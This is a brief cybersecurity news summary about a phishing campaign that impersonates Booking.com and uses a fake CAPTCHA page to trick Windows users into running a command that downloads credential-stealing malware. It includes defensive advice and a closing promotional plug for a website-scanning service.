The attack begins with phishing emails disguised as Booking.com communications, containing fake customer inquiries, account verifications, or promotional offers. The email directs recipients to a website mimicking Booking.com, where a fake CAPTCHA prompt appears. This verification page instructs the user to execute a command through the Windows Run dialog, unknowingly initiating the download of malware. Microsoft has identified multiple malware strains in this campaign, all designed to steal financial data and credentials.
The use of a verification step adds a layer of deception, making the phishing attempt appear more legitimate. Microsoft warns that such tactics exploit human problem-solving tendencies, increasing the likelihood of victims falling for the scheme.
Booking.com has confirmed that its systems remain uncompromised but acknowledges that some of its partners and customers have been affected. The company emphasizes that it never requests payment details via email, chat, text, or phone and is actively investing in security measures to protect users.
Security experts caution that this technique, while innovative, requires a moderate level of technical proficiency from victims, potentially limiting its effectiveness. However, organizations are advised to enhance user awareness and restrict administrative privileges to mitigate risks associated with such phishing attacks.
Source: Dark Reading
The European Cyber Intelligence Forum is a nonprofit think tank specializing in intelligence and cybersecurity, offering consultancy services to government entities. To mitigate potential threats, it is important to implement additional cybersecurity measures with the help of a trusted partner like INFRA www.infrascan.net, or you can try yourself using check.website.